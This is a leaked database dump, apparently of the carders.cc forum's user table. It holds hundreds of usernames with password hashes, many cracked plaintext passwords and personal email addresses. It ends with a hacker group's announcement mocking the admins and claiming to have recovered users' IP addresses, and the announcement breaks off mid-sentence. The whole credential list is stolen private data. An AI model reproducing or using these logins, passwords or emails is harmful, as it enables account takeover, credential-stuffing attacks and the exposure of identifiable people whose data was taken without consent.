+innoc3nce:6cd9b924b73441e3f07c59ba96c0b1a4::cherry-kiss-91@live.de +zukow:dc990ef2f4e980e1b8fd90a6de0fbc8232f1f3aa::Gilfer-bloke@web.de +lexx:0a5780f1a2f37499398a04f7c86596a7e8e6107b::13lexx37@googlemail.com +Futurama:153029f70e1651fc81c3d2fb3e0fe2540a43deca:mukmuk:slaglosv@web.de +Bichlor:b6e466deeaea52cce60f0c97c535d9f4ecca8e0b::bichlor@web.de +mario-cro:e8597cfa71243997e3c82b54ddacc52c::m.lazeta@web.de +bLack_Q:478c2c402781c9c194510c613f3b188f9f763eb3:hammer:pwn0r666@web.de +Achmatov:ba236930311308aa447481d5528357a7aa82bb71:123lol:salitosx3@gmx.de +jerm83:9db572f0cb09c4feffa2c4f33558f1ad::kewljermain@hotmail.com +lauderer2008:8a551e24c9f1425fc33cd1f1514dfce2::fabianorth93@web.de +bigafkman:c1bf5084fd09a76f8c79bd003b7352fabf09ee69::bigafkman@web.de +CC-Selling:e1f5afd16a0c72f6f764a3888157353d::a1510973@owlpic.com +julia:ae9fab2c6f53d18c3e45a1f39d71a135a0287929::juliamaier55@gmail.com +FAM3STAR!:feb05dac25875d74908f1c25e9ff59aa25ce80be:ficken14:fam3starpimmel321@gmx.de +suckmydick1337:afde9da72303e04f1f37fc6e9e9d9903::suckmydick1337@web.de +Bronxx:68d630d81d7fca6cbd32d6cb227349f1::bronxx@mail.com +sysfuck:e052329cc5a790a992aa9c5ba3fd2c48::admin@sysfuck.at +wowww:5d3c39b683d37caf7bc896283ce58d5c4f3278ca:hallo123456789:wolfgang_wow@web.de +Fallout:840e813386bd727e815b0e4e0330e7f91366396b::sascha.kruckow@web.de +joekio:53dcd494c680b0fca67040b59ab114b6::joekio@hotmail.es +silexx:8f26d5750a4f3641b7b2dd457bfa6fb55f4d662a::jt265@hotmail.de +Tobii:686bcac91f2672452d344e2e8455ba18425fcecc:tobi88:a1524729@owlpic.com +DerReudigste:54bafe497d2c9a0c6b11fda92c0d2fcf::exserxxl@yahoo.com +Loxx:0ee1e8c4c965b745ec78174dd1c7135dd982acf4::wowgogo44@googlemail.com +haxxorre:0cabbb8d1a4b9a566877271c4ead041e2357b0ec:lolchen:entryyy@hotmail.de +tork777:6170860ba5c05c967416b4e159b2b7588815135c:sander123:opferlui@web.de +koksi2:1eb46e85ec60e760bf08406108455577::koksi007@gmail.com +skype888:e5554cef57dd98a6c92c228971c2f5323d6d0db0::ttony37@gmail.com +zuN:f610bdb7b6c1e83f946417786b942d1f::1337zuN@web.de +MyKilla:ca489879f4c4af26b430c81fe20b2300e2c35e3a:123456789:Erogo@web.de +marpe:72d98d0e1141c1e1d985c3a06154af7a4e629e75::uwe.marpe@gmx.de +zpanti:bc6e658feaed27c1a052148a72540dd60dca6709:topsecret:zpanti@live.de +malakuso:b4ceffe0c206ac58ccd3a29b4a65851c::Hong_Kong@web.de +berka:146cbd7dd5bf1e2c6352ebca7445ee89::mozilla00@list.ru +Mindfreak:6484ff268c9e651ed559938adef2451f::russische_wurst@hotmail.com +Methamphetamin:cb8de2f6ba9b9aa38351f01f9ad2cc21::methamphetamin@hotmail.com +robsN:61ba131fb8d71900f9ac64321131b4e7ab9fcb36:logitech:robinprieb@hotmail.de +r4iden:4854e2d463f812289913c4652927a606b46b156b::adfhj4p@web.de +Bluber:6b725e65eb5f13095d9160db37d29e0e::niko.uz@hush.com +BlackDesert88:2cb23eaf3d7986a2b8768181d5b7f0b9bc1ce6cf::checkerboy7@freenet.de +Jensushido:87d0be83244c03f512e10697e8fd7da81740dd91:Homier:jan.flick@gmx.net +Ghost1337:8068b7776657344b09d18406b2588c07::deniz-nl@hotmail.de +Xdia:e450b209c024af77b3cfcb94e854cbb2ca18ed82:Inka2004:sirius.root@gmail.com +hansi3000:e2281020b02b40ba0d16b9e94da50e3fbb53712c::scheissdreck3000@trash2009.com +Classic:e28127382e3e2fd4d88b3b74aabc803d0443280f:fanta11:a1809706@owlpic.com +Lutti325:41cfc75cb32b08c14ac644e16232c21c::BigBozzLutti@hotmail.de +1nv1s1bl3:fd7135ad2603d5d73ef1e80c2487e3a70a278a47:drink1:ghgaghawg@live.de +Collecter:e75d53b84a34327a17ee1afce3d692493d45cdad::collecter@hotmail.de +invad0r:2b686ee67d40577ae18fc224d43576e5::invad0r@web.de +multikulti:8bacbef7d92fde105d5da9373a8c1e584ed33166::erdwurm2000@live.de +Snipez44:972aa103500099b48a2a3b382fdd37c51b9b2a80::snipez666@web.de +appl_:5333caa43b2b9993990fe4255546ce6c::bih.braco@gmail.com +YaYa:aec4a1d8fdd0ffd27085a80ca1a9547eca56622c:ichich11:yeahhh09@freenet.de +suizid.cc:ef47a406207d9434f4daa486d596ee13::stranalle99@web.de +prototyp:591c850f41f27fb3247b4f6e6102864e::germanbusiness@safe-mail.net +Panzerschokola:2765348b41965dcba54d87b8625fa5ad284ab463::Jensenmensen@hotmail.de +Q7:744af0051dd0dada6f5c5f2a271c5758b86e8d41:sander123:sanderq7@web.de +Dexx:a11203e742a333d1fb0f98accc2e6a6f9e76fb97::admin@dexx.to +marley:196c7402dbe7942cae58c51703f5424c::marley_p@live.de +eazy-cc:dbbf0cd6b8fe05e7b426aa178e5b0f2d::a1665408@owlpic.com +ccSeller:1654558828348f3232d883cb06d833ac::seller09@gmx.de +magnum:e63cc66c3838237a158420a3d9edf89f::christofhuebert@googlemail.com +xNZ:ea923fe62f26198beaf67c9a068f44fccdc03917:20031995:xnz_v1@hotmail.de +Slayer616:8f7863d8829dc1bf5fe0d563ff43da36d8e40b3e:qwertz:slayer616@scenecoderz.cc +XiR:6ceac6e610b71288b910f4a19f260961::maybe.exe@live.de +GH3TToBoSs2009:be8494111251ca8c466d552bf279704c2a780524::ghettoboss2009@gmail.com +scorpion94:a60ba091246e22319d9726d2fe0b8062a92d01bf::nur.ich.wer.sonst.solls.sein@googlemail.com +eX0duS:4876c3583c9c86da121c3c9d43980941fb8f8866:dominik:ready.to.die@hotmail.de +santoz:a96d94041b1a0e12c1e54f115b6cbf7525d720cd:123456:santoz1991@googlemail.com +sandora:48ae546e709ad889818b3176251083678d9f1d4b:supi:sandora@safe-mail.net +bedrock:6158a8da2145b5fa7080c29e4260763b7939bb97:internet:bedrock123@hushmail.com +_daddy_:052b40328f067f366a2b89b3a3219cf2728d5d6f:123456:Eden.Sabine@web.de +L1ght:d92b4c32873ce399f5181ce6f1b58a14bdb334b3:Faker123:l1ght@live.de +x-trem:08d45498b8f1bd3fea7ef487732ee3dc::enex.oezpolat@gmx.de +Xer0x:0dbd3fa6f3333d6b4c0cc482f3e1c476da520bbb::ati@live.at +B0ZZ321:680cb38a357947286449fe301fd2b55fb5fd3218::m7475958@googlemail.com +miXer:321cf944149a99a0ec47d149581efed8471c3c64::mixer6346@yahoo.com +Chains:7e4e0923b825812e9f9202c1490131808781e953:jagdfieber:Bicosmetik@web.de +ch!xz:4c28a0d81f4d1c99dfd32fb97a26555cfd95aa98:freaks:ceyphone@gmail.com +Herbal:7497d2c69e992a235a958f33ff6f2b19::herbalstuff@inbox.ru +Digifree:1497ddc8ca7f86756716284ee7fd9017::Digifree@hushmail.me +BLACKEMPERATOR:ea98e7ca5ff9ca1b5dcd54d5c8184770::lingomagma@googlemail.com +Lukas:d0528cf277ad36acc56173d710504f51c8fdba34:denkste:darkcrey@hotmail.com +Kashim:371e59c6687296dcc567e505978ab73587ac05f0::kashim2@web.de +pc_freak99:73df60f8a6a2642b821e0224f2b604fb6d27d51b::pc_freak99@yahoo.de +inharmony:fd89c06a1adb6afdf33c93b6c257d94bb54b8a1f:ende2006:i.fake@live.de +accounts4sale:ddb47a0db5e3da1cdf63bc67cff3f5da::deineoma@live.com +redITALY:5383ff10c9da0dc58349941a93eae35fe11c37e9::jonnygomma@secure-mail.biz +Megaplayer345:c6a1947e1062c97679e8faeda8d67979::klimakontrakosten@hotmail.de +Zagor:b46f75ecd38bfcd0c0e295d3401a2f67cccb3394::email237958@20minutemail.com +xBlackDragonx:b6645658971794ad7a2c91da80150e41::ferhat.akbulut98@web.de +Klapskalli:dc61d1acd4540b141b11d121f1ae597b::a1751409@owlpic.com +test4eas:a75d8035a387bb55e042edf95c9832bcfdee4e6a:0123456789:test4eas@hotmail.com +hack3d:a18f67e5aa5afff8ced88daccfb61836::a1753581@owlpic.com +mygirl:4756820a95ee857b9675dc5e1721e91b::anja.klein94@yahoo.de +pyr0:ac74a5c672fd197eb5e2a3f28dc85577443049de:r3l0ad3d:pyr0@freeunix.net +ASUS_freak:1591c693bcdf255ec28aac2a98649ee29a3c8b03:sander123:XPSnoob90@web.de +bangyoursis:a3fa9e18630389d8969001cd1ab835c4::blaupause2000@oleco.net +hallohallo:91820cf2ae1c934c7a64bc9a3666d673::hallohallo121212@hotmail.com +# p u R e :b4dae948f850913c9d7b5ecfc5906c7f::pure1337x1337@live.de +Cryy:69672e53d57ad29cb90d859e0ad0f85c3bfb1228::kingjulez@mail.3dl.am +nico277:07f14345612da2b87966b716755105fe6988c870::nico_bozz@hotmail.de +kinay01:0279c96509d36c8a7e7c3872e17d98ab::kinay01@gmx.de +Spongebob:72aa3d11f153946a1d8057a2bd4f2574::a1768291@owlpic.com +oCoN2010:456b9c8054dc3df5c9483b68143968b7::fdesfesrf@web.de +evil_xs:fb31ff66299e33d3b68627621d33d637::6Rncmv3ZCPrCt89t@web.de +Balkanic:d31a2dce7d9578aed27172dd5366a05ab748403b::k.antonio@t-online.de +PAPER BANG:79e95bfa4c220e0d6b967bacdc33a8d56d4b0b2d::yaskoor@hotmail.de +bangyourbro:6a78c69e1d1b8aabd660358d72ebc722::boeserbube2000@arcor.de +seNsi2008:cd1781c785c754300749b5ebd092e1e9::koolsavas14@hotmail.com +hackbart2:92830f80846544578cc9f24452aa8008d9a1a52e::hackbart2@hushmail.com +mX:fb1cf107ab6961724d6796061676423045517998:pcw123:mxtheg@web.de +karlheinz:65660f52501ae19de3c6df8071bd74b0::eor-skampy@gmx.de +gasmend:c6768b0aa0070405b83649357acfa9d2::rsskiller@hotmail.de +PublicHero:9b1bd9f0109076fbfaae8a5603fea90dcda8c7d3::SteamGermany1@web.de +Slike:9c63677b3c7096bcd821e0bd77d4780f::MrCsszocker@googlemail.com +KaZaa:6840ae42308d72beea3b4e1968148c68::KaZaa1337@web.de +Fruchtii:326c1536972de4f0d9eaeebb239ad9b847369b94:a1b2c3d4:gerrito@hotmail.de +Freestyler_Tak:c338b2446be52e922e68a174c0d6d96368cda421::Freestyler_Tak@mail.3dl.am +Kamikaze:232f51fce6e218c861abdd51111a3878::a1806513@owlpic.com +OriginalArisch:03e1009e879a0761f5843f44e137f1db::original_arisch@freenet.de +trueone:295c1c61cc9dac40da914b11c0b35c13::trueone@hotmail.de +KM92exe:a3562698bba4a8635b702a4bae0ce7b720ad3c8f::mr.km@hotmail.de +CreditCards:53575a7fc6456c83497db451941ca793::a1828837@owlpic.com +praisen:8c11b2bdb4996035fa8787d1118dc617::hurensohntodes3@hotmail.de +Pedda:2765ad48f06ad9229e3c9a658b6b71eb7242453c::pedda88@gmx.de +Jonny:192194ae133396636171a3f717f986971d249c21::jonnymail@secure-mail.biz +skampy:c5b5bcd52afbbfb4f51fdf3f0c6346f4::xsc-skampy@gmx.de +BossHoss:19e1df5e909daf549c103486dd6f406a656a948b::bosshoss123@freenet.de +Solih:2a58ec89a42eeb28e697cd724f7f4ea4913d74a6::xfraukex@gmx.de +dadruoygnab:11dac2b6d979fd35b58f53a0f7d6084a::marco198555@arcor.de +GhettoTurtle:d8c62a46f352ab888e1af8f1042421dd::a1851774@owlpic.com +IchBossDuNix:4de2f8334a70a93265f73dc06b0b54d7c70a54c4:ficken14:christiannau@web.de +Lov:a122c64534e5f252878797d1a0b150a80ab69528:123123:lov300@googlemail.com +Juflemm:662ebd1088d19b3a1492a1f853822010515058eb:flemmig:julflemm@googlemail.com +checkdada:3c4fe8a707e2ea47960502bbf35cace6::nabenay@gmail.com +derchillertyp:c515bd4dc7369540581dfd665a1848994637fa00::pivibibi@hotmail.de +relat0r:f61414a3b2bde9cf8646f5e730a036d4f93081b2::relat0r@hushmail.com +s1rX:87351815021a993e86b779bc6797ef4b::PSchloder@web.de +DERCOOLECLINT:6439acec1f594bfa5a9dfd96263a46f4::eineinselmit2bergen@arcor.de +medo:ea8b86b9556d085e2a281e8b25c2cbf4d436b726:123456:moon.miko@yahoo.com +xcard:6e2274cd6a8ec03ac3fd19e511206b3ef1f4f8d7::rhgang@gmx.de +bubumaster:bec7264865bb339a215e2ba210540f518bb8854b::icq2009@safe-mail.net +Eylex123:07ff38937aeef3846bcb75c291563c4fc0528242:Lisa123:carder1992@gmx.de +Money4Payment:f65b78ebef120ced51194d8cd69be6be33d99c8a::quality-service@web.de +Elitecracker:ce4376e56552fa091be48e3c8f5df5fec32b8a99::Elitecracker@web.de +BaseDrums:063e964aeb3af69e5ec60619aec076fd::basedrums@secure-mail.biz +CoolBoy:ca275f924c373f05bdde8fb50872fb16a6235d91:oblivion2:forcexx@hotmail.de +Z0t@c:1dbd2d22597ee54c7a00d0dd67dfb893::david-28@gmx.de +ZeroOwner:074781fb82141fd8abfa4187d40a0ae8f097a500:asdf1234:robertgroeser94@web.de +armizor:e98164414c8964e3a58737af496410bf5f3c7707::armizor@gmail.com +nanostray:80276b69f76c7c8ab3f1fd3a5b5e6a58::asdkandk@aksdjmwiad.de +MontanaMax:b04f8852a353f282f5fc6ef42417ee40e2d229a3:kingring:acerpayworks@googlemail.com +SpainDeluxe:ab9a58b01fdea77dfddc07557b05241990b76895:711681:Joerg.Ebersbach72147@web.de +accountseller:fb395ee7a46186631986992716377500a5a779d3:12345678:feurichchips@hotmail.com +happys:688f9559909fdb7af04f333881f51ba3::holkyx@gmail.com +Bombe009:a3d40411a2731bcbd4a08a83a24edb61::koschen@online.de +little z3r0:1743c33eb2e04c8fa1c705cfcb2367e8::little_z3r0@live.de +rofl33:21adfb40f523692b0434ef7b0d79a3c0::lorofl_123@hotmail.de +g0sha:06fd1bc0dbf314e0dcb583f0fa43c013bb63a8f8:orange75:nompere2000@yahoo.com +Overturn:c78aa64e2cf53b13d5e5344ff99e3f71919bb00b::dj-overturn@hotmail.de +peter777:51c7c901431a9b232b1df4d0ed61ffc4::poker777@hotmail.de +Cartridg3:0a08290966bf618b40f73f65aac333041a6d9907::Cartridg3@secure-mail.biz +ChaosUnskilled:b97537f401355946fe6844fd74cb101588115f55:feuerwerke:amrit_thind@hotmail.com +Crackhead:fa8916c7559696918023555813012a9d::william-e@gmx.de +Suchka666:8572f2fb354809592036cd102244e8f6::billg@gmx.de +ZiPPo:aac00d9370aff90a99026ca0cba9d21c3dcd582e:polo09:ppt6@mail.3dl.am +jimmybob:1b1ed89ebc6598ac5881c8290cb7d197::jimmybob@secure-mail.biz +Lemon:9945278674e97870b0bf0c8ae2de814b46c33c77::lemon88@live.de +Violence:d12fb29469b27adc9e19cdbe560e6a9be6575fff:12345678:violence@live.de +blackschadow:f8631454ae03a8fe4fb31492246f3f6100e4bb55::thisismybest@live.de +brainwash1337:58f46e0a6d9859c1e7a253eec48f96e0a397e00c:abc123:stranqe@gmx.net +1llegal:57fcab79fd937c965c629362009844d894c5074b:lasvegas:Thorsten.braun11@web.de +flava:b9b72ed9d109cb88de4ac96246129de72cf87c49:gradiska:srb_alex_94@live.de +SalviaDivinoru:afc11613aba504f582da6eacf4433da196045d91::SalviaDivinorum@fivemail.de +kingzaza45:1fdb276ca0a042b7d76517b9457385e5016e23ce::piedemonde@yahoo.de +Knocki:c7432574f739efcc9d916c75b48140348b9c6ffd::4dahaxx44@gmx.de +nike-air-max:863d29f2477f91b025b58339562c6367::LarsBolte@gmx.de +Fenriz187:968cd44bd5477582cde03830350952b8c6be08ae:grimnir:fenriz_666@gmx.de +RockstarGuava:9d18433195e87ec9ad6d454ce3adcac8::rockstarflavour@yahoo.de +skor:847cd608ec1e1ca75afe85e43c405358::devex@gmx.net +fuck_systems:235327bfab5ce606967a3a7fcf6691c76cacefe4::hannu@sysfuck.at +f_white:174cd595302471ba6e09436359eed22550b8075b:hanswurst:katisneider@yahoo.de +crackwh0re:f3825599275801e34784fdca7f67a855::a1979711@owlpic.com +2trist:be3812c7c952a6d2f54ada9852f70317::2trist@mail.ru +FU-Yok:6e18fec34b9510b16c1ad0f682c0b76b2de965f7:123456:fu0yok@gmail.com +Slang:b8898d1b9cd8016334dea9331b6e0a9f::a3870691@owlpic.com +0grish:abe3eda164cb318f91cb9aefb654b56790bc7613:lol109:ogrish@w.cn +georgr123:e25ed6b3b16d02b177ca4a41cdc9078c592a02de:asdasd123:ipod-@hotmail.de +Solid1234:5f14be734621b8fa933c8d9c99c224bafe06da7b:test1234:agamersday@hotmail.de +Jozgi:eeb6d67e0fb9d617de7d04d9b2487ce446c44e46::thejozgi@googlemail.com +Fuyox3:2f6c51679a21c0f152250e8b42c8bdd4fe15501b::xuxx@gmx.de +TUTK1NG:84a109a2db2fc0240c9ad9af0bce43ae::esel_by@web.de +Pr0h4ck3r:3671e9d31ad6f94946ffbd86d1414751019f6f32:aq7idn4n:thomasmue@arcor.de +M.O.B:a04c477e9b8b327442a482b451900bb549aa649e::gunfiregettinsprayedquicker@yahoo.de +CCprogamer:0fc52520aec0ba156092e476e8bfaf7d::max.riegler@codingcafe.de +Herz0g:622887422da70c2e3d9b47fb41f2716a0cc9fb65::blauesreh@web.de +g-mod:89b88c80e84860204bbcbbafb57bf6c602de0593:123456:jojo187@live.de +PeteSniff:d7d5d42e2f07d46b75f6c1292b9b8da3a12985cc:ggcut2k3:petesniff@hotmail.de +ItsMagic:fc9b4ce3e9cecd4fd47776bf7e381747::itsmagic@safe-mail.net +HouseWLW:b4ab7b3d5b7e9dd6d2e57651c2b91787::13crazy37@googlemail.com +Yahel:3a4080313764f22bb935b7068f4631ac4be4d446::myahel@gawab.com +ingredible:6585e14b159d82b318530bbaf285a385a10ead9e::jessi.roths@web.de +Ratzinger:5cad7b6924a2bb713efa200edfc5979a::Philipp.Barth98959@web.de +Soniix:772b7b910a7979a023dcdb19a9df1bbc::c.ritzer@gmx.at +lol-wtf:1b4f69931271a64a7d7ff48d4fdea9a9::Ultra_Extreme@web.de +Oldsql:5f8cc371cb33c60a541f3759ce90acf5efbe8a92::0ld5ql@mail.ru +nomnomq:d24368fb25965b13d85c7a366e511a76::sebi62@gmx.de +sektenfire:fa2ccb42ba9a2ea06bd7bf9a1df7fcbf69a7c42d:hurensohn:sektenfeurre@gmx.de +mrvN.:c01646578e3c2175331f0f40b40f7b9d::killerno1@hotmail.de +JohnnyBlaze:e3b4b04a4c8057e3bf36f160628d1218::diablo222@hotmail.de +jonnyh667766:43d3b376a9298721f04e9a9637bcf901::lisaholup@web.de +Sh4d0wH4wk:05dbd898c1c8545de2f262228e93057d10876f5a:ppilihp:peter.schallhauser@yahoo.de +d4nniiistar:5b526319b9d9f0474791ce503d71c083775e6f75:ultrakill:zet0@rediffmail.com +Xellent:461c24c25a8be6c0802fb8e950992df82d521c58:532422:cruzer5324@web.de +Daywalker:f81e6a8169e98e69ff6110b11afbf70d78f420ce::kraftakt@hotmail.de +tomizme:c905f31fcfa42a46c631ca5340302339::theaceofcoins@yahoo.com +aLph4Tier:1798584186fece8250ff51de3ba5bf3bd13e99ad::ersguterjunge_91@hotmail.de +Chakuza:b9eedfb3cc9dad4e26ae0447249d4879::klingenbergerrobert@yahoo.de +blackplanet:2f30f2e6297aeaefd6340b937851ad7d::ILdfytgvlo@kurzepost.de +Bam:98440c4a5389ce26481d93c5b1d0fa45::klitschko09@yahoo.de +Detlev:3d3af1a9990b75fa28843be620b00db1c6ae1729:yakumo:detlev1900@hotmail.com +klodeckel:42725e7ae3d04f973a17eea1974d7f44f77b70f0:infanterist2000:a4088154@owlpic.com +choco-pie:f4fa1cab4b8c724dbd091bbd585e92e1999eb27b::choco-pie1@web.de +nate:bd73f3abc1c057ede01858fab3d32c6637b6490b::nathan115@freenet.de +missulasch:83d8a2dcea726281b939a1aed6526470b4fb6358::missgulasch@yahoo.de +ximmyaner:ab52d39a334dfeb964f713cfa1c200d7::martin@sramko.de +Perezhilton:989afe3e26bd85fa7b0f54ff2244b6d3::MichaelAlbrecht3@gmx.de +lolicious:4343adfd263428230c2a0f27b9f2a92a::lolicious@hush.com +cboolator:c1922fc3c3a35e4c6697e6aa285610d4739536ab:affenbande:flawless.mobile@googlemail.com +ArA Crew X:0f72384dee35d90ea981a25472d694625ca92c59:lilecahi:ozz.olivia@yahoo.com +Kira:b5e9abd1d8c316168f82166ce56dda83::d1gg1@t-online.de +m0nk:d0c246eec2a9ea47d56e9bd1f7a3feae772695bf:88888888:bobmarley@rastafan.org +Vicious:a4b5ec14b9f9f3be6b0bc1f67aa3207f::b3n@live.de +$$man:95a21e6a3b69235f2a3af883f8eadc4b4fd1ce07:canelle:adam.corder@yahoo.com +Maskulin:1cb85deafcf4838880a4e1a5a95b62a9291b47d9:24071990:phenom_massacra@web.de +LiLaLaunebaer:50b9fe37adb85e1eb6d16fbdd69e29ee41973882::Li-La-Launebaer@gmx.net +NedoB:4617ecdcf3cf60f823aeceed9726f7c9::nilidome@web.de +katan10:47b02f1d083f6d2f6948ca3734122dfa::mes100cvv@yahoo.fr +#1103;/R/#1103;:c62a4ba8354085ae314dfec5a89a927e::Spamferkel123@web.de +FaridaKa.:419d39f2d899b8192972ec999badeaeb::tocca@hotmail.de +Digipal:c3e337f070b64a50e9d31ac3f9eda35120e29d6c:mw221u:splendid446@yahoo.de +Ochoa:1b9e466a6b90d48c17df922c06e0f5991ab92f8b:zudale:royaltherapy@rediffmail.com +HitchCocK:d82e5d89e9fa067cff35bd9ca6f9704244ff2dc0:animal88:HitchCocK69@bk.ru +cRanc:b0d1c34422dc8b945bf3454d57e0e424bede51c7::auto2010@web.de +Terrorhost:b8c521ab7fc18dc40eda818c0faccc49::laurawebcam20@live.de +shdiam0nd:3fb2701571c98b6519ca5fca6796a868be11cc6d:refuser:ronald.weas@gmail.com +Crax0r:5aefb1fbc1b75b4ed354dbbc19bc370359277af8:slayer:slayer8@web.de +Hans.Dieter.HD:8dafdf9a0ef2fc40b3d8e3d155a7d3cb::jacktheripper@ausi.com +doker:f1c664d458b038295e375e46b2144a0c::doker@gmx.net +Brutus:85a49a054fc71e64e2ba76a82bba391bef0418fa:seppl01:kelevra1983@web.de +Cr4ckEd:300c8d1e457a339641c2ebd26f48e4edadae5326:philips2:Joetra9090@gmx.de +B1G:47c967c57d0aa229089de534c922a45d2ec5e6b2:03150405:eric.fischer@hotmail.de +PATYA:4e8d162cfff7d8a23c34f6433a632906::paty.a224@yahoo.de +mari:2ff58a6af612646c1bdbb10db79de469::tino68169@yahoo.de +S1CK0NE:0cbf29d52438b059c4bb203fd297f2c9222151c5::s1ck0n3@hotmail.de +razer413:210106da8415a02536157d04b201d900a9b4cde7::razer413@googlemail.com +test1000:c847f5e56364399813bbe565eae899982c5678bf::test10015@web.de +D3NN1Sxxx:41c14da4c0105b2046200e3101c74760::warhammeronlinemail1@web.de +bifrostilo:4c6216cbe0ee90f22eee0bb3e7160999::renehuebner.de@gmx.de +niiq:9fdb66e8ea2e92265789aa6ca662fe2fcd7d3842:moorhuhn1:niiq@hotmail.de +GKink70:7a74441108a8f06d1fd4e26ebf367ef038b2d32c::streetkillaz@live.de +m0rphin:15b8a42abf2a33c67615c6d1c19e01a944ec45d7::m0rphin@mail.nu +Lolz0r:5fcac7b5f5faf0f03817d0a58b8c1b1cf168596a::flerrek@hotmail.de +Kitatix:90bf728194cd94fe7a05d3bfc8b04054992370e6:latte.:kitatix@googlemail.com +$73f4n:902585c8315c4ff4d18f7e0c21c4004a::stefan149@hotmail.de +n00b:31d956fa144e6447846445af84d93a1d::n00bsmail@mail.ru +wLan-kabel:b350df6bc081fab65db0fd44f2c9419c::a2215561@owlpic.com +serpe:d93bbca869d030c474e1508719d34948530b0ebd::tjadden23@live.de +ganja405:0511cff7247a5ac644da859f629f5d98::sebastianhamm95@gmx.net +Arschloch:e83255bd18f2812b980024a36ac93fc9::a2163149@owlpic.com +manus:dfb91d79a6f200e503b9e2deae395302c389518f:slave:manusfloris@yahoo.co.uk +meini7:0f899ffe95ba0dc988200578dabc86b638b36368:passwort:meinhardranzinger@gmx.at +fukuda:861ddf9d65dc21f09b7e55491d1475e8710d1da0:esperanza:yailen@hotmail.com +Zukunft:43bcf9c64f804041f0653cd1e7255269::zukunft11@live.de +YouTube:6eb2dda34b3ffe3822bf1e04b5a741e44fca2c5f:hundebengel:a2181705@owlpic.com +4got10:0c45eee1c537b25f8337c8c6dffa0787303aa269:writer4:4got10@gmx.de +Claude:6c3463b58cffc781a3b14cd069619452::a2189788@owlpic.com +SceneCoderZ:465c042559e561cb311225cac28c6914::a2199982@owlpic.com +Malware:07b676ee7b4b02ee270f08e0c03092bb::holtus456@gmail.com +Dischi:d7bae8b637c5a09b29e3303958fba913::David.Bohm71155@web.de +Chr|s:c805a8f3b14614beb1586fc0d17371bd::alien-rider@web.de +Mr.Dee:603009db0d6706e940f04ca2cd085eb27fc8734f::celicasupra@freenet.de +Don:65b40689468e1cba9099fbcbe5ffc710::spirit8888@mail.3dl.am +silver-sk8:3c05c55a42e03546051d36e3150134fc51e7a6b7:sukram::crassbone@gmx.de +Wladikey:3d3bd24e6c2c65c9c11021bb9eea52fcc85605a4:ei5423e:wladikey3000@yahoo.de +Sguschonka:d3fbe6372b94f43a20fdb6b3d93995342c91fab8:123456789:1337acc@web.de +StealerExe:ce29bfd578d1d68c4fcf594a7eef90ba::georg.sammer@web.de +D3NN1Sx:4182b1d867e485d24311258072b904c62fb1e339:counter:ottobirger@web.de +sptr:970a7767d33e6decdfc4b97bf72c14a48a8be106:hure12345:spitt3r@gmail.com +Crackinprogs:4d332494a2948d4a83ddaab8353a9e9bb03ff5d7:12345678:ecsrofan@yahoo.de +Kompakkt:b58e6f69ddeda9160d3891326913fdce::kompakkt@web.de +majo:dc8d0c7845b14780c3e385d437cce540::pio@netterchef.de +~Tony~:91aa4736580b7d6d2b47afc00cd86d3b75606327::Tony_321@web.de +ottomueller3:85005ab579b89e50e22c2749d14368db98edcec7::ottomueller2009@googlemail.com +ThePretender:3213e3dc3cac1b09c51658a1cc83cba1eda95053:asdf1234:rico4life@hotmail.co.uk +Decker:ada44420e7dcca5ca518c7bb60f26986::ahmedmueller@web.de +PommesGabel:67b9bd333eafde1991c4a7a1ba8f35006c8fad1e::Wigger@gmx.de +G00DF3LLA:c5248fe92306ed130d1099ed92606a60a6881e64:lunaj225:G00DF3LLA@warez.tc +PapaSchlumpf:bb6192ff7257a7bc38c46c9d74796bde:: +APPA:50ee0cd4f0e5617e75be896cb3732c6077852d06:w1w2w3w4w5:w8-9@hotmail.com +test5798:4bf09f1b48577bfc5d9cbeda04395d6ea23afc05:changeme123:test123452123@web.de.la +test551:15947151cc0ec4e529129cff8fa496f7e1d9e3bd::test@te345345st.de +G0D:2e0aeed6a0c02739f5cb22d9e22a4b6a25bf9387::service0900@googlemail.com +Zerozucka:3fe192367aa9c17efda9a4221b2f3e76be69b9e9::fafnirs2@web.de +fantas:8e70ae107ab163817203f62724eb8e925c7fa206:hamburg:timjs@hotmail.de +Aietes:089d80cfe3719ecb1997cc5a91be4eb58c2437c6:annalena1:change@me.com +M0RPHEUS:0e1fcbc99653e4c09bbc389d5b547897c177055e::changeme@safe-mail.net +Geld.de:b21418af25b550bf51f8ddde7c895e1f51703dda::d0wn@live.com +PowerPoul:2e1f08a057c8be39939381c141ce936301be827f::admin@powerpoul.com +DougHeffernan:ef1aaca2e2e5acb07b8109c1eaabd16ccbac2524:bastard12345:changeme3@me.com +Chinchilla:d320382bbcedf3ef02e7e76f662d4f4ea326ea78:oqiliga3:chinchilla141291@web.de +Korsastoff:29fde4c5c360e4915f44b603064945a56f0d60eb:hurensohn:ordermorris@web.de +carders.cc hostingservice:d61a458d7fb176437a1978311a5117fe81c1daaf:changeme:changeme@cardershostingservice.cc +h4x0r:eee0c924784492eaadbfaa4db881ed7685b50ba4::Levin7@hotmail.ch +Slickkr:fb9b7ecd017ea3da0c2fee0c396980af4560bab1::Pitrinusdietrich2@freenet.de +Psychoviper:2bd1ab26126bb59a4ce868378ad1138f53e3228f:insider123:jan4noip@web.de +Crisis:d91e2ba5763093be450cc4933b35d51d21cda3b6::niklas.v@mail.ru +perfect:a301f7f19b64a1424cc27137f4a6fdf2d4763204:deathrow:musama.yay@web.de +Pindolek:d6e47f4fa4401deaaaf6982fe2e14449d9062611:1234$test:changeme@carders.cc +bergmanndreck/n0nam3:157946d5d06ad27b538af6a25db4b7602dd6b64e::n0nam3@hushmail.me +BackStab:7b6797cd118cdfa2797ec71761365ed83087b2fa::admin@backstab.biz +Parkour_:30c38172354cd65c0bba1cafd9f81b9c1a717bc0::Mueller_Simon_KA@web.de +Raz313373:a0294f848ed2d26b3704f5b72a4cf8d76f8185c4::razerzu@web.de + + / +*//////{<>===[IP's]==================================================- + \ + ____________________________________________________________________ +| __ __ | +| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | +| | _ | | | _ || _| -__|| _ | _ |_ _| | +| |__ |_____|_____||____|_____||_____|_____|__.__| | +|________|__|________________________________________________________| +| | +| THANAT0S: Nach wie vor werden hier keinerlei IPs geloggt, was euch | +| jedoch nicht am Nutzen von VPNs hindern soll! | +|____________________________________________________________________| + +We have good and bad news for you. The good news first: THANAT0S did +not lie. Their access.log did not include real user ips and they +overwrote $_SERVER['REMOTE_ADDR'] with a random ip. Now what's the bad +news, you may ask. The Carders.cc admins seemded actually too dumb to +disable ALL of the logging, giving us enough possibilites to get +what we wanted. Even a LOT more than enough, means we got a lot more +info than you 